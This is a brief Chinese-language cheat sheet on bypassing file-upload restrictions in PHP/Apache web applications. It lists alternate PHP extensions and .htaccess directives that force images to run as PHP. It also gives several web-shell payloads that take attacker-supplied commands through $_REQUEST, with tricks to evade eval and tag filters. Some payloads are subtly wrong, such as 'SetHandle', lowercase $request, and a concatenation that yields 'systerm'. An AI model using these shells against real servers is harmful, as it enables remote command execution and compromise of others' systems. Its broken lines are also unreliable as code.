一、后缀名绕过
1、默认情况下,lamp会将php\phtml\php3\php4\php5\pht等文件解析为php
1、php\php5\php4\php3\php2\phtml\pht
2、特殊后缀.htaccess/.user.ini
.htaccess //.htaccess是apache的配置文件,只能在存在apache的中间件时才能生效。定义了重写当前目录下的解析规则
AddType application/x-httpd-php .jpg /将当前目录下的jpg文件解析为php文件
SetHandle application/x-httpd-php //将当前目录下的所所有文件解析为php文件
二、内容过滤
<? 过滤:绕过方法 <script language>eval($_request[x]);</script> //php版本<7
php过滤:短标签<?=ls?> //直接执行系统命令没有输出; <?=`ls`?>//直接执行系统命令有输出; <?=`$_REQUEST[cmd]`?> //cmd直接执行系统命令
eval过滤:
换函数,assert\system
大小写绕过:
动态拼接:$a='sys';$b='term';$c=$a.$b;<?php $c($request[x]);?> //eval函数不能拼接,assert、system可以
运算:异或运算